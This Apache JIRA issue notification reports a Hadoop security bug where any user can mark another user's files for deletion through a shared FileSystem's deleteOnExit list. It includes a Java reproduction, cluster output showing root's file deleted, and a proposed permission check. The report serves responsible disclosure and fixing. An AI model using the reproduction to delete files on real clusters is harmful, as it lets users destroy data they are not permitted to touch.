[ https://issues.apache.org/jira/browse/HADOOP-15725?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Oleksandr Shevchenko updated HADOOP-15725:
------------------------------------------
    Description: 
Currently, anyone can add any file to a FileSystem's deleteOnExit list. This leads to a security problem: a user ("Intruder") can get hold of a file system instance that was created by another user ("Owner") and mark arbitrary files for deletion, even if the "Intruder" has no access to those files. Later, when the "Owner" invokes the close method (or the JVM shuts down, since a ShutdownHook closes all file systems), the marked files are deleted successfully, because the deletion is performed on behalf of the "Owner" (i.e. the user who ran the program).

I attached [^deleteOnExitReproduce], which reproduces this scenario. I was also able to reproduce it on a cluster with both the Local and the Distributed file systems:
{code:java}
import java.security.PrivilegedExceptionAction;
import java.util.Arrays;

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.security.UserGroupInformation;

public class Main {

  public static void main(String[] args) throws Exception {
    // Get a FileSystem instance as the user running the program ("Owner", here root).
    Configuration conf = new Configuration();
    conf.set("fs.default.name", "hdfs://node:9000");
    conf.set("fs.hdfs.impl",
        org.apache.hadoop.hdfs.DistributedFileSystem.class.getName());
    final FileSystem fs = FileSystem.get(conf);
    System.out.println(fs);

    // A file the "Intruder" has no permission to access.
    Path f = new Path("/user/root/testfile");
    System.out.println(f);

    // The "Intruder" (here the "hive" user) reuses the Owner's FileSystem
    // instance and marks the file for deletion on exit.
    UserGroupInformation hive = UserGroupInformation.createRemoteUser("hive");
    hive.doAs((PrivilegedExceptionAction<Boolean>) () -> fs.deleteOnExit(f));
    System.out.println(Arrays.asList(hive.getGroupNames()).toString());

    // Closing the FileSystem deletes the marked file on behalf of the Owner.
    fs.close();
  }
}
{code}
Result:
{noformat}
root@node:/# hadoop fs -put testfile /user/root
root@node:/# hadoop fs -chown 700 /user/root/testfile
root@node:/# hadoop fs -ls /user/root
Found 1 items
-rw-r--r-- 1 700 supergroup 0 2018-09-06 18:07 /user/root/testfile
root@node:/# java -jar testDeleteOther.jar 
log4j:WARN No appenders could be found for logger (org.apache.hadoop.conf.Configuration.deprecation).
log4j:WARN Please initialize the log4j system properly.
log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info.
DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_309539034_1, ugi=root (auth:SIMPLE)]]
/user/root/testfile
[]
root@node:/# hadoop fs -ls /user/root
root@node:/# 
{noformat}
We should check user permissions before marking a file for deletion; one possible direction is sketched below.
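For example, here is a rough sketch of such a check (illustration only, not a final design; it assumes the existing FileSystem#access(Path, FsAction) API and arbitrarily requires WRITE on the path, while the real fix would likely live inside FileSystem#deleteOnExit itself):
{code:java}
import java.io.IOException;

import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsAction;
import org.apache.hadoop.security.AccessControlException;

public final class CheckedDeleteOnExit {

  /**
   * Only mark the path for deletion on exit if the current caller
   * actually holds the required permission on it.
   */
  public static boolean deleteOnExitChecked(FileSystem fs, Path f) throws IOException {
    try {
      // access() throws AccessControlException when the caller lacks the permission.
      fs.access(f, FsAction.WRITE);
    } catch (AccessControlException e) {
      return false; // do not register paths the caller cannot modify
    }
    return fs.deleteOnExit(f);
  }

  private CheckedDeleteOnExit() {
  }
}
{code}
Whether the right condition is WRITE on the file, WRITE on the parent directory, or an owner/superuser check is exactly the kind of detail I would like to discuss.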
Could someone evaluate this? If no one objects, I would like to start working on it.
Thanks a lot for any comments.


> FileSystem.deleteOnExit should check user permissions
> -----------------------------------------------------
>
>                 Key: HADOOP-15725
>                 URL: https://issues.apache.org/jira/browse/HADOOP-15725
>             Project: Hadoop Common
>          Issue Type: Bug
>            Reporter: Oleksandr Shevchenko
>            Priority: Major
>              Labels: Security
>         Attachments: deleteOnExitReproduce
>
>



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
